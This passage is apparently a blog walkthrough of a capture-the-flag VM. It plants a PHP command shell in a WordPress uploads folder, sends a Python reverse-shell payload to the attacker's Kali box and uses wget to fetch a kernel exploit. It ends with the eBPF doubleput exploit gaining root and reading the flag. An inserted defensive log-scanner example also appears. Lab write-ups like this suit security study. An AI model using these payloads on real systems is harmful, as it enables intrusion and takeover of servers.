<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This exports two additional environment variables: SSL_CLIENT_CERT and</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> SSL_SERVER_CERT. These contain the PEM-encoded certificates of the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> server (always existing) and the client (only existing when client</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> authentication is used). This can be used to import the certificates</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> into CGI scripts.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o StdEnvVars:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This exports the standard SSL/TLS related `SSL_*' environment variables.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Per default this exportation is switched off for performance reasons,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> because the extraction step is an expensive operation and is usually</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> useless for serving static content. So one usually enables the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> exportation for CGI and SSI requests only.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o OptRenegotiate:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This enables optimized SSL connection renegotiation handling when SSL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> directives are used in per-directory context.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><FilesMatch "\.(cgi|shtml|phtml|php)$"></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLOptions +StdEnvVars</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span></FilesMatch></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><Directory /usr/lib/cgi-bin></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLOptions +StdEnvVars</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span></Directory></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSL Protocol Adjustments:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># The safe and default but still SSL/TLS standard compliant shutdown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># approach is that mod_ssl sends the close notify alert but doesn't wait for</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># the close notify alert from client. When you need a different shutdown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># approach you can use one of the following variables:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o ssl-unclean-shutdown:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This forces an unclean shutdown when the connection is closed, i.e. no</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> SSL close notify alert is send or allowed to received. This violates</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> the SSL/TLS standard but is needed for some brain-dead browsers. Use</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> this when you receive I/O errors because of the standard approach where</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> mod_ssl sends the close notify alert.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o ssl-accurate-shutdown:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This forces an accurate shutdown when the connection is closed, i.e. a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> SSL close notify alert is send and mod_ssl waits for the close notify</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> alert of the client. This is 100% SSL/TLS standard compliant, but in</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> practice often causes hanging connections with brain-dead browsers. Use</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> this only for browsers where you know that their SSL implementation</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> works correctly.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Notice: Most problems of broken clients are also related to the HTTP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># keep-alive facility, so you usually additionally want to disable</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># keep-alive for those clients, too. Use variable "nokeepalive" for this.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Similarly, one has to force some clients to use HTTP/1.0 to workaround</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># "force-response-1.0" for this.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># BrowserMatch "MSIE [2-6]" \</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span>nokeepalive ssl-unclean-shutdown \</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span>downgrade-1.0 force-response-1.0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ErrorDocument 400 /custom_400.html</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span></VirtualHost></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></IfModule></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># vim: syntax=apache ts=4 sw=4 sts=4 sr noet</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# </span><br />
<br />
The webroot is /var/www/https. With this I can create a PHP file in the uploads directory using /var/www/https/blogblog/wp-content/uploads/ in phpMyAdmin. Let's first test this with a dummy file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-llqWFdHM6z0/V1pFePqj_nI/AAAAAAAABhU/ZlcRHwBM44AMLoXOwKBOUx2uyfpSnbRtQCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B23-08-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://2.bp.blogspot.com/-llqWFdHM6z0/V1pFePqj_nI/AAAAAAAABhU/ZlcRHwBM44AMLoXOwKBOUx2uyfpSnbRtQCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B23-08-37.png" width="640" /></a></div>
And it's accessible.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# curl -k https://192.168.1.3:12380/blogblog/wp-content/uploads/test123.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">test123</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# </span><br />
<br />
Next is to create a PHP file which will run system commands.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-UU84svzyutc/V1pFeEEwihI/AAAAAAAABhU/jgxqfa9stXcxN1ys_sJYMK08rjKvdfhtQCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B23-10-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://2.bp.blogspot.com/-UU84svzyutc/V1pFeEEwihI/AAAAAAAABhU/jgxqfa9stXcxN1ys_sJYMK08rjKvdfhtQCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B23-10-32.png" width="640" /></a></div>
<br />
The command supplied to the 'c' param gets executed.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://192.168.1.3:12380/blogblog/wp-content/uploads/shell.php?c=id</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-EgHt8KVW1xY/V1pOTpPq6wI/AAAAAAAABhc/sZgzdoPJs6Yv26LCjuYx_oVP0CbPTn9MwCLcB/s1600/Screenshot%2Bfrom%2B2016-06-10%2B01-20-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-EgHt8KVW1xY/V1pOTpPq6wI/AAAAAAAABhc/sZgzdoPJs6Yv26LCjuYx_oVP0CbPTn9MwCLcB/s1600/Screenshot%2Bfrom%2B2016-06-10%2B01-20-43.png" /></a></div>
Now we need a reverse shell from this. After many attempts, I managed to get a reverse shell using the Python one-liner from <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">PentestMonkey's reverse shell cheat sheet</a>.<br />
<br />
The payload looks like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://192.168.1.3:12380/blogblog/wp-content/uploads/shell.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%22192.168.1.7%22,1234%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27</span><br />
<br />
In this payload, 192.168.1.7 is my Kali Linux box listening on port 1234.<br />
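A defender's counterpart to the upload-to-execution path described above, added here as an example and not part of the original post: it parses Apache access-log lines and flags any request that executes a PHP file from the wp-content/uploads directory (which WordPress should only ever serve as static files), and separately flags query values that invoke an interpreter with inline code. The log lines are constructed samples, and the log format, hosts and paths are assumptions.

```python
"""Flag requests that execute PHP from a WordPress uploads directory.

Added example, not part of the original post. The log lines below are
constructed to resemble Apache's combined log format; hosts, paths and
timestamps are assumptions, not data captured from the VM.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed Apache "combined" format: host ident user [time] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# WordPress keeps user uploads here; nothing under it should run as code.
UPLOAD_DIR_RE = re.compile(r'/wp-content/uploads/', re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|phar|cgi|shtml)$', re.IGNORECASE)

# A query value that hands inline code to an interpreter (e.g. "python -c ...").
INTERPRETER_RE = re.compile(r'\b(python|perl|bash|sh|nc|ncat)\b\s+-[ce]', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of findings for a parsed entry (empty when nothing is suspicious)."""
    findings = []
    parts = urlsplit(entry["target"])
    path = unquote(parts.path)
    if UPLOAD_DIR_RE.search(path) and SCRIPT_EXT_RE.search(path):
        findings.append("script-in-uploads")
        # A 200 means Apache handed the file to the PHP handler, i.e. it executed.
        if entry["status"] == "200":
            findings.append("executed")
    query = parse_qs(parts.query, keep_blank_values=True)
    for values in query.values():
        if any(INTERPRETER_RE.search(unquote(v)) for v in values):
            findings.append("interpreter-in-query")
            break
    return findings


def scan(lines):
    """Return (host, decoded path, findings) for every line with at least one finding."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            path = unquote(urlsplit(entry["target"]).path)
            results.append((entry["host"], path, findings))
    return results


# Constructed sample lines (not captured from the VM).
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Jun/2016:01:20:43 +0000] "GET /blogblog/wp-content/uploads/2016/06/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Jun/2016:01:20:50 +0000] "GET /blogblog/wp-content/uploads/test123.txt HTTP/1.1" 200 8 "-" "curl/7.47.0"',
    '10.0.0.7 - - [10/Jun/2016:01:21:02 +0000] "GET /blogblog/wp-content/uploads/shell.php?c=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Jun/2016:01:22:15 +0000] "GET /blogblog/wp-content/uploads/shell.php?c=python%20-c%20%27import%20socket%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jun/2016:01:23:00 +0000] "GET /blogblog/wp-login.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, path, findings in scan(SAMPLE_LOG):
        print(f"{host} {path} -> {', '.join(findings)}")
```

The text file and the image pass untouched, while both hits on shell.php are reported; the same check applied to the web server's configuration (no PHP handler under uploads) removes the "executed" case entirely.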
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# nc -lvp 1234</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">listening on [any] 1234 ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">192.168.1.3: inverse host lookup failed: Unknown host</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">connect to [192.168.1.7] from (UNKNOWN) [192.168.1.3] 46444</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/bin/sh: 0: can't access tty; job control turned off</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ uname -a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ lsb_release</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">No LSB modules are available.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ lsb_release -a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">No LSB modules are available.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Distributor ID:<span class="Apple-tab-span" style="white-space: pre;"> </span>Ubuntu</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Description:<span class="Apple-tab-span" style="white-space: pre;"> </span>Ubuntu 16.04 LTS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Release:<span class="Apple-tab-span" style="white-space: pre;"> </span>16.04</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Codename:<span class="Apple-tab-span" style="white-space: pre;"> </span>xenial</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ cd /tmp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 7 root root 4096 Jun 10 10:35 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .ICE-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .Test-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .X11-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .XIM-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .font-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ wget http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">--2016-06-10 10:36:28-- http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connecting to 192.168.1.5:80... connected.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP request sent, awaiting response... 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Length: 20480 (20K) [application/x-tar]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Saving to: 'exploit.tar'</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0K .......... .......... 100% 15.0M=0.001s</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2016-06-10 10:36:28 (15.0 MB/s) - 'exploit.tar' saved [20480/20480]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 48</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 7 root root 4096 Jun 10 10:36 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .ICE-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .Test-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .X11-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .XIM-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .font-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 www-data www-data 20480 Jun 9 18:45 exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ tar -xf exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 52</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 8 root root 4096 Jun 10 10:36 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .ICE-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .Test-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .X11-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .XIM-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 2 root root 4096 Jun 10 08:54 .font-unix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 www-data www-data 4096 Apr 25 23:25 ebpf_mapfd_doubleput_exploit</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 www-data www-data 20480 Jun 9 18:45 exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ cd ebpf_mapfd_doubleput_exploit</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 www-data www-data 4096 Apr 25 23:25 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 8 root root 4096 Jun 10 10:37 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 www-data www-data 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ./compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c: In function 'make_setuid':</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .insns = (__aligned_u64) insns,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .license = (__aligned_u64)""</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 60</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 www-data www-data 4096 Jun 10 10:37 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxrwxrwt 8 root root 4096 Jun 10 10:37 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 www-data www-data 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 www-data www-data 12328 Jun 10 10:37 doubleput</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 www-data www-data 8020 Jun 10 10:37 hello</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 www-data www-data 7516 Jun 10 10:37 suidhelper</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 www-data www-data 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$ ./doubleput</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">starting writev</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">woohoo, got pointer reuse</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">suid file detected, launching rootshell...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">we have root privs now...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=0(root) gid=0(root) groups=0(root),33(www-data)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cat /root/flag.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~~~~~~~~~~<(Congratulations)>~~~~~~~~~~</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-'''''-.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |'-----'|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |-.....-|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> _,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> __.o` o`"-. | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-O o `"-.o O )_,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">( o O o )--.-"`O o"-.`'-----'`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> '--------' ( o O o) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `----------`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b6b545dc11b7a270f4bad23432190c75162c4a2b</span><br />
<br />
I used the same root exploit from Solution 1 as I'm exhausted from working so long on this. I'll try next time to find out the other 2 methods of privilege escalation.<br />
<br />
